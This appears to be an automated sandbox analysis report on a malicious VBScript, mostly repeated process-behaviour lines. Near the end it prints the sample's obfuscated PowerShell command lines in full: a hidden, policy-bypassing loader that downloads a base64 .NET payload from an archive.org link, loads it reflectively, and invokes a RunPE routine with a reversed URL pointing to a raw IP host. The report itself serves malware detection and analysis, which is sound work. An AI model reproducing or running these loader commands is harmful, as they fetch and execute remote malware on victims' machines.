Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFB4AF2A499 sldt word ptr fs:[eax] 4_2_00007FFB4AF2A499
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1892 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 977 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4099 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5658 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1640 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4936 Thread sleep count: 4099 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344 Thread sleep count: 5658 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104 Thread sleep time: -17524406870024063s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: f4576JaIo9.vbs Binary or memory string: CKzkKfUAfWqKGGnWKi = "ojCbzKhaGvvmCIuUKx"
Source: wscript.exe, 00000000.00000003.1445828342.000001AEE8627000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ojCbzKhaGvvmCIuUKx@
Source: wscript.exe, 00000000.00000003.1449571908.000001AEE87B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ojCbzKhaGvvmCIuUKx
Source: powershell.exe, 00000004.00000002.1988564778.000002669D0DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: wscript.exe, 00000000.00000003.1445613803.000001AEE85C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pxWfBPZfdluZBpUvmcith
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWicrJ25pdScrJ3JsJysnID0gN3VYaHR0JysncHM6Ly9pYTYnKycwJysnMDEnKycwJysnMCcrJy51cy4nKydhJysncmMnKydoaXYnKydlLm9yZy8nKycyNC9pdGVtcy9kJysnZScrJ3RhaCcrJy1ub3RlJysnLXYvRGUnKyd0YWhOb3RlVi4nKyd0eCcrJ3Q3JysndVgnKyc7JysnWicrJ25pYmFzJysnZTY0JysnQ29uJysndCcrJ2VudCA9IChOZXctT2InKydqZWN0IFN5Jysnc3RlJysnbScrJy4nKydOJysnZScrJ3QuV2ViQycrJ2wnKydpZW50JysnKS5EbycrJ3cnKyduJysnbG9hZFN0JysncmluZyhaJysnbicrJ2l1cmwpJysnO1puaScrJ2JpbmFyeUMnKydvbicrJ3RlbnQnKycgJysnPSBbUycrJ3lzdGUnKydtLkMnKydvJysnbnZlcicrJ3RdOjpGcicrJ29tQmFzZTY0U3RyaScrJ24nKydnKFpuaWJhc2U2JysnNENvbnQnKydlJysnbicrJ3QnKycpOycrJ1puaWEnKydzc2VtYmwnKyd5ICcrJz0gW1JlZmwnKydlY3QnKydpb24nKycuQXNzZScrJ20nKydibHldJysnOjpMJysnb2FkJysnKCcrJ1onKyduaWJpJysnbmFyeUNvbicrJ3QnKydlJysnbnQpO1onKyduJysnaXR5cGUgJysnPScrJyBaJysnbmlhc3NlbWInKydseS5HZXRUeXBlKDd1WCcrJ1InKyd1JysnblBFLkgnKydvJysnbWU3JysndVgnKycpOycrJ1puaW1lJysndGgnKydvZCcrJyAnKyc9IFonKyduJysnaXR5cGUuJysnRycrJ2UnKyd0TWV0JysnaCcrJ29kJysnKDd1WCcrJ1YnKydBSTd1JysnWCk7WicrJ25pbWV0aG8nKydkLkknKydudm9rZSgnKydabicrJ2knKyduJysndWxsLCcrJyAnKydbJysnb2JqZWMnKyd0W11dJysnQCcrJyg3dVh0eHQuRicrJ0ZDTlIvNDEnKyc0Mi81OC45OCcrJzEuMicrJzMnKycyLjI3MScrJy8nKycvJysnOnB0dGgnKyc3JysndVggJysnLCA3dVhkZXNhdGl2YScrJ2RvNycrJ3VYICcrJywgN3UnKydYZGVzJysnYScrJ3RpJysndmEnKydkbzd1WCAsJysnIDd1WCcrJ2QnKydlc2F0aXZhZG83dVgsNycrJ3VYUicrJ2VnQScrJ3NtNycrJ3VYJysnLDd1WDcnKyd1WCkpJyktUkVwbGFDZSAoW0NoQXJdNTUrW0NoQXJdMTE3K1tDaEFyXTg4KSxbQ2hBcl0zOSAtUkVwbGFDZSdabmknLFtDaEFyXTM2KSB8LiAoICRlTlY6Y09tU1BlQ1s0LDI0LDI1XS1qb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWicrJ25pdScrJ3JsJysnID0gN3VYaHR0JysncHM6Ly9pYTYnKycwJysnMDEnKycwJysnMCcrJy51cy4nKydhJysncmMnKydoaXYnKydlLm9yZy8nKycyNC9pdGVtcy9kJysnZScrJ3RhaCcrJy1ub3RlJysnLXYvRGUnKyd0YWhOb3RlVi4nKyd0eCcrJ3Q3JysndVgnKyc7JysnWicrJ25pYmFzJysnZTY0JysnQ29uJysndCcrJ2VudCA9IChOZXctT2InKydqZWN0IFN5Jysnc3RlJysnbScrJy4nKydOJysnZScrJ3QuV2ViQycrJ2wnKydpZW50JysnKS5EbycrJ3cnKyduJysnbG9hZFN0JysncmluZyhaJysnbicrJ2l1cmwpJysnO1puaScrJ2JpbmFyeUMnKydvbicrJ3RlbnQnKycgJysnPSBbUycrJ3lzdGUnKydtLkMnKydvJysnbnZlcicrJ3RdOjpGcicrJ29tQmFzZTY0U3RyaScrJ24nKydnKFpuaWJhc2U2JysnNENvbnQnKydlJysnbicrJ3QnKycpOycrJ1puaWEnKydzc2VtYmwnKyd5ICcrJz0gW1JlZmwnKydlY3QnKydpb24nKycuQXNzZScrJ20nKydibHldJysnOjpMJysnb2FkJysnKCcrJ1onKyduaWJpJysnbmFyeUNvbicrJ3QnKydlJysnbnQpO1onKyduJysnaXR5cGUgJysnPScrJyBaJysnbmlhc3NlbWInKydseS5HZXRUeXBlKDd1WCcrJ1InKyd1JysnblBFLkgnKydvJysnbWU3JysndVgnKycpOycrJ1puaW1lJysndGgnKydvZCcrJyAnKyc9IFonKyduJysnaXR5cGUuJysnRycrJ2UnKyd0TWV0JysnaCcrJ29kJysnKDd1WCcrJ1YnKydBSTd1JysnWCk7WicrJ25pbWV0aG8nKydkLkknKydudm9rZSgnKydabicrJ2knKyduJysndWxsLCcrJyAnKydbJysnb2JqZWMnKyd0W11dJysnQCcrJyg3dVh0eHQuRicrJ0ZDTlIvNDEnKyc0Mi81OC45OCcrJzEuMicrJzMnKycyLjI3MScrJy8nKycvJysnOnB0dGgnKyc3JysndVggJysnLCA3dVhkZXNhdGl2YScrJ2RvNycrJ3VYICcrJywgN3UnKydYZGVzJysnYScrJ3RpJysndmEnKydkbzd1WCAsJysnIDd1WCcrJ2QnKydlc2F0aXZhZG83dVgsNycrJ3VYUicrJ2VnQScrJ3NtNycrJ3VYJysnLDd1WDcnKyd1WCkpJyktUkVwbGFDZSAoW0NoQXJdNTUrW0NoQXJdMTE3K1tDaEFyXTg4KSxbQ2hBcl0zOSAtUkVwbGFDZSdabmknLFtDaEFyXTM2KSB8LiAoICRlTlY6Y09tU1BlQ1s0LDI0LDI1XS1qb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('Z'+'niu'+'rl'+' = 7uXhtt'+'ps://ia6'+'0'+'01'+'0'+'0'+'.us.'+'a'+'rc'+'hiv'+'e.org/'+'24/items/d'+'e'+'tah'+'-note'+'-v/De'+'tahNoteV.'+'tx'+'t7'+'uX'+';'+'Z'+'nibas'+'e64'+'Con'+'t'+'ent = (New-Ob'+'ject Sy'+'ste'+'m'+'.'+'N'+'e'+'t.WebC'+'l'+'ient'+').Do'+'w'+'n'+'loadSt'+'ring(Z'+'n'+'iurl)'+';Zni'+'binaryC'+'on'+'tent'+' '+'= [S'+'yste'+'m.C'+'o'+'nver'+'t]::Fr'+'omBase64Stri'+'n'+'g(Znibase6'+'4Cont'+'e'+'n'+'t'+');'+'Znia'+'ssembl'+'y '+'= [Refl'+'ect'+'ion'+'.Asse'+'m'+'bly]'+'::L'+'oad'+'('+'Z'+'nibi'+'naryCon'+'t'+'e'+'nt);Z'+'n'+'itype '+'='+' Z'+'niassemb'+'ly.GetType(7uX'+'R'+'u'+'nPE.H'+'o'+'me7'+'uX'+');'+'Znime'+'th'+'od'+' '+'= Z'+'n'+'itype.'+'G'+'e'+'tMet'+'h'+'od'+'(7uX'+'V'+'AI7u'+'X);Z'+'nimetho'+'d.I'+'nvoke('+'Zn'+'i'+'n'+'ull,'+' '+'['+'objec'+'t[]]'+'@'+'(7uXtxt.F'+'FCNR/41'+'42/58.98'+'1.2'+'3'+'2.271'+'/'+'/'+':ptth'+'7'+'uX '+', 7uXdesativa'+'do7'+'uX '+', 7u'+'Xdes'+'a'+'ti'+'va'+'do7uX ,'+' 7uX'+'d'+'esativado7uX,7'+'uXR'+'egA'+'sm7'+'uX'+',7uX7'+'uX))')-REplaCe ([ChAr]55+[ChAr]117+[ChAr]88),[ChAr]39 -REplaCe'Zni',[ChAr]36) |. ( $eNV:cOmSPeC[4,24,25]-joiN'')" Jump to behavior
